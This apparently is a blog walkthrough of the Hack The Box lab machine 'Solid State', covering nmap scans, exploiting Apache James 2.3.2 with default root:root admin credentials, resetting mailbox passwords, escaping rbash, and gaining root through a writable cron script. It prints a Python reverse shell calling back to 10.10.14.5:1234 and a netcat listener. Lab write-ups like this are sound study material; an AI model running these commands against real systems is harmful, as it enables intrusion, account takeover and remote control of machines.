Solid State HTB

solid state hack the box info card

ENUMERATION

NMAP

The scan returned multiple interesting services:

# nmap -p- -sV -sC --script vuln 10.10.10.51 -o solidstate.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:47 EDT

Nmap scan report for 10.10.10.51
Host is up (0.050s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown: 
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.51:80/
|     Form id: name
|     Form action: #
|     
|     Path: http://10.10.10.51:80/index.html
|     Form id: name
|     Form action: #
|     
|     Path: http://10.10.10.51:80/services.html
|     Form id: name
|     Form action: #
|     
|     Path: http://10.10.10.51:80/about.html
|     Form id: name
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp  open  pop3        JAMES pop3d 2.3.2
|_sslv2-drown: 
119/tcp  open  nntp        JAMES nntpd (posting ok)
|_sslv2-drown: 
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 25 SMTP

We have an smtp services running. This {VRFY EXPN RCPT – pentest monkey} explains how we could connect and test smtp service on port 25.

# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT)
VRFY
502 5.3.3 VRFY is not supported
EXPN
502 5.3.3 EXPN is not supported
RCPT
503 5.5.0 Need MAIL before RCPT

Since the service does not support the first two protocols we’re going to use RCPT.

$ /usr/share/legion/scripts/smtp-user-enum.pl -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51 
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Thu Apr 15 06:23:54 2021 #########
######## Scan completed at Thu Apr 15 06:24:02 2021 #########
0 results.

168 queries in 8 seconds (21.0 queries / sec)

I have also tried enumerating for email addresses by adding “-D 10.10.10.51” and “-D solid-state-security.com” but again with no success. ( if you think you know why – add a comment – Thanks!)

Port 80 HTTP

The nmap scan reveals a web service running. Let’s try to find hidden directories/files. The scan already reported some possibly interesting directories, however, upon checking them – did not find anything important.

Dirbuster

sqlmap

I have tested the js false-positive just for the sake of it, and proved that it is not injectible.

Port 4555 tcp admin-James

Searchsploit

We can’t but notice that the exploits are for the same version as the one running on the machine.

# searchsploit JAMES      
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                      |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                    | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)| linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                 | windows/remote/944.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

The following picture is from the RCE python exploit. It seems the default credentials are root:root. Let’s test it

$ python 35513.py 10.10.10.51                                                                                                                          1 ⨯
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

Now, in order to execute the payload we need to find a way to login to the machine. There is an smtp service running and we know the default credentials root:root

$ telnet 10.10.10.51 4555                                                                                                                                                                                                            130 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

listusers   
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin

setpassword mailadmin mailadmin
Password for mailadmin reset

exit
Unknown command exit

quit
Bye
Connection closed by foreign host.

Cool, I have logged onto the service by using default credentials, we understood what users exist, and we were able to change passwords. Now I am going to access the account for mailadmin since It looks the most juicy one.

  1. Credentials mailadmin:mailadmin
  2. It will prompt you to a window that says that it uses plain text and not encrypted. Confirm and continue
  3. Ok, apparently the mailadmin account was a waste of time, lol :D. Let’s repeat the process for the rest of the accounts ( click set up another account) and hope we get something out of it.
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mindy mindy
Password for mindy reset
  1. Mindy’s account has a welcoming and an access emails which contains a password.

Ok, so upon logging in through ssh with the following credentials: mindy:[email protected][email protected] the python exploit runs and a bash_completion file is created. However, we’re put in a rbash shell.

$ ssh [email protected]   

Received: from 10.10.14.5([10.10.14.5])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 902
          for <../../../../../../../../etc/[email protected]>;
          Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
Date: Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
From: [email protected]

$ whoami
-rbash: whoami: command not found

I have managed finally to escape the restrictive shell by adding “-t bash”.

$ man ssh

</deleted>

-t      Force pseudo-terminal allocation.  This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services.  Multiple -t options force tty alloca‐
             tion, even if ssh has no local tty.

</deleted>
ssh [email protected] -t bash                                       

[email protected]'s password: 
${debian_chroot:+($debian_chroot)}[email protected]:~$ ls
bin  user.txt
${debian_chroot:+($debian_chroot)}[email protected]:~$ whoami
mindy

Privilege escalation

Enumeration

$ bash linenum.sh > output.txt

I did not manage to find anything interesting apart from some system ports that are open. Next script I’d like to try is probably unix-priv-check from pentestmonkey however, the box did not have strings which is a requirement for it to run.

writeable files/directories

$ find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null

-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

$ cat tmp.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

NICE! We have a root-owned file which we could modify and execute. Let’s escalate. I have proven myself that cron executes the file every minute:

!/usr/bin/env python
import os
import sys
try:
     os.system('touch /tmp/shell.py;python /tmp/shell.py')
except:
     sys.exit()

After a while, a file was created in /tmp/.

I have edited the file with the python script from the reverse shell sentrywhale‘s website:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Catch the shell.

$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 39694
bash: cannot set terminal process group (3597): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# ls
ls
file.py
root.txt

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: